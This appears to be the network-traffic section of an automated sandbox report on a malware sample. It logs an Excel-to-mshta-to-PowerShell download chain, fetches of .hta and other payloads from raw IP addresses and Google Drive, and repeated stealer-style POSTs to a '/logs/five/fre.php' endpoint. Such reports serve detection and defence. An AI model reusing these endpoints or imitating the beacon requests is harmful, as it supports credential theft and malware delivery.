        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
        Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49169 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49175 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49176 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899E4B18 URLDownloadToFileW,5_2_000007FE899E4B18
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3B4F527.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "20a04-6252e4f9e216e"
        Source: global trafficHTTP traffic detected: GET /36/goodthingswithgreatcomebackwithgreatthigns.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Thu, 24 Oct 2024 00:44:54 GMTConnection: Keep-AliveHost: 192.3.176.141If-None-Match: "20a04-6252e4f9e216e"
        Source: global trafficHTTP traffic detected: GET /36/LOGS%20LOKI.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/LOGS%20LOKI.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: mpa.li
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: unknownHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 176Connection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 06:46:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
